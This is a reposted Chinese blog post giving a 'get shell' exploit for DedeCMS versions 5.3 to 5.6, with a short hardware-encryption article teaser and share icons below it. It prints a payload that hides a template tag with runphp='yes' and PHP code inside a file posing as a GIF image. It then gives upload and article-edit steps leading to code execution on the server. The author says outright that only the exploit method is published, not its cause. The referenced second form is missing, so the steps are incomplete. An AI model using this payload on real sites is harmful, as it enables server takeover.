此0day已经出现了相当长一段时间,今天配合小龙同学提供的日志看了下代码,了解了漏洞成因。大多同学对成因不感兴趣,这儿就只公布利用方法。
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
保存为1.gif
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif 
发表文章,然后构造修改表单如下:
红色部分都 是需要注意的地方,得根据实际情况进行对应修改。
修改完成后查看文章即可。
文章来源于lcx.cc:【转载】dedecms v5.3-v5.6 Get Shell 0day
相关推荐: 【文章】10.5 硬件加密与软件加密 - 加密盒
10.5 硬件加密与软件加密 硬件 直到最近,所有加密产品都是特定的硬件形式。这些加/解密盒子被嵌入到通信线路中,然后对所有通过的数据进行加密。虽然软件加密在今天正变得很流行,硬件仍是商业和军事应用的主要选择。例如,NSA只对硬件加密授权使用。为什么这…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论